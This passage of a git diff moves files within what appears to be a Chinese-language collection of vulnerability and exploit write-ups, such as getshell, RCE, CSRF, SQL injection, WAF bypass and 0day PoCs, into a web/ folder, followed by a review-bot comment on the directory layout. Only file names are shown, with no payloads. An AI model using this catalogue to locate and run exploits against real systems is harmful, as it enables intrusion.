nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md" "b/web/cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md" similarity index 100% rename from "cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md" rename to "web/cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272\351\231\204PoC.md" 
diff --git "a/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md" "b/web/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md" similarity index 100% rename from "freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md" rename to "web/freeFTP1.0.8-'PASS'\350\277\234\347\250\213\347\274\223\345\206\262\345\214\272\346\272\242\345\207\272.md" diff --git "a/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" "b/web/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" similarity index 100% rename from "indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" rename to "web/indexhibit cms v2.1.5 \347\233\264\346\216\245\347\274\226\350\276\221php\346\226\207\344\273\266getshell.md" diff --git "a/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/joyplus-cms 1.6.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" 
diff --git "a/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" "b/web/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" similarity index 100% rename from "maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" rename to "web/maccms_v10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\344\273\273\346\204\217\350\264\246\345\217\267.md" diff --git "a/rConfig v3.9.2 RCE\346\274\217\346\264\236.md" "b/web/rConfig v3.9.2 RCE\346\274\217\346\264\236.md" similarity index 100% rename from "rConfig v3.9.2 RCE\346\274\217\346\264\236.md" rename to "web/rConfig v3.9.2 RCE\346\274\217\346\264\236.md" diff --git "a/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md" "b/web/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md" similarity index 100% rename from "showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md" rename to "web/showdoc\347\232\204api_page\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240getshell.md" diff --git a/solr_rce.md b/web/solr_rce.md similarity index 100% rename from solr_rce.md rename to web/solr_rce.md diff --git "a/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md" similarity index 100% rename from "thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md" rename to "web/thinkphp5\345\221\275\344\273\244\346\211\247\350\241\214.md" 
diff --git "a/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md" "b/web/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md" similarity index 100% rename from "thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md" rename to "web/thinkphp5\346\241\206\346\236\266\347\274\272\351\231\267\345\257\274\350\207\264\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214.md" diff --git "a/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" "b/web/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" similarity index 100% rename from "typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" rename to "web/typecho\345\217\215\345\272\217\345\210\227\345\214\226\346\274\217\346\264\236.md" diff --git "a/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" "b/web/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" similarity index 100% rename from "yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" rename to "web/yii2-statemachine v2.x.x\345\255\230\345\234\250XSS\346\274\217\346\264\236.md" diff --git "a/zzzcms(asp)\345\211\215\345\217\260Getshell.md" "b/web/zzzcms(asp)\345\211\215\345\217\260Getshell.md" similarity index 100% rename from "zzzcms(asp)\345\211\215\345\217\260Getshell.md" rename to "web/zzzcms(asp)\345\211\215\345\217\260Getshell.md" 
diff --git "a/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md" "b/web/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md" similarity index 100% rename from "\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md" rename to "web/\343\200\2200day RCE\343\200\221Horde Groupware Webmail Edition RCE.md" diff --git "a/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" similarity index 100% rename from "\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" rename to "web/\344\272\224\346\214\207CMS 4.1.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" diff --git "a/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md" "b/web/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md" similarity index 100% rename from "\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md" rename to "web/\345\277\253\351\200\237\345\210\244\346\226\255sql\346\263\250\345\205\245\347\202\271\346\230\257\345\220\246\346\224\257\346\214\201load_file.md" 
diff --git "a/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md" similarity index 100% rename from "\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md" rename to "web/\346\236\204\345\273\272ASMX\347\273\225\350\277\207\351\231\220\345\210\266WAF\350\276\276\345\210\260\345\221\275\344\273\244\346\211\247\350\241\214.md" diff --git "a/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" similarity index 100% rename from "\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" rename to "web/\346\263\233\345\276\256 e-cology OA \345\211\215\345\217\260SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" diff --git "a/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md" "b/web/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md" similarity index 100% rename from "\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md" rename to "web/\346\263\233\345\276\256OA\347\256\241\347\220\206\347\263\273\347\273\237RCE\346\274\217\346\264\236\345\210\251\347\224\250\350\204\232\346\234\254.md" 
diff --git "a/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md" "b/web/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md" similarity index 100% rename from "\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md" rename to "web/\346\263\233\345\276\256e-mobile ognl\346\263\250\345\205\245.md" diff --git "a/\350\207\264\350\277\234OA_A8_getshell_0day.md" "b/web/\350\207\264\350\277\234OA_A8_getshell_0day.md" similarity index 100% rename from "\350\207\264\350\277\234OA_A8_getshell_0day.md" rename to "web/\350\207\264\350\277\234OA_A8_getshell_0day.md" diff --git "a/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md" "b/web/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md" similarity index 100% rename from "\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md" rename to "web/\351\200\232\350\276\276OA\345\211\215\345\217\260\344\273\273\346\204\217\347\224\250\346\210\267\344\274\252\351\200\240\347\231\273\345\275\225\346\274\217\346\264\236\346\211\271\351\207\217\346\243\200\346\265\213.md" 
diff --git "a/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md" "b/web/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md" similarity index 100% rename from "\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md" rename to "web/\351\200\232\350\277\207phpinfo\350\216\267\345\217\226cookie\347\252\201\347\240\264httponly.md"
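Review bot: a few of the files this rename block moves into web/ are not web-application write-ups, for example `CVE-2020-8794-OpenSMTPD ...` (a mail server), `freeFTP1.0.8-'PASS' ...` (an FTP server) and `cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow ...` (a local configuration-audit tool), so the new directory name misdescribes them; consider a separate directory for these, or leaving them at the top level, so the web/ taxonomy stays meaningful. Since every entry here is a pure rename (similarity index 100%) with no content change, any README or index entries that still reference the old top-level paths must be updated in the same commit, or those links will break once this lands.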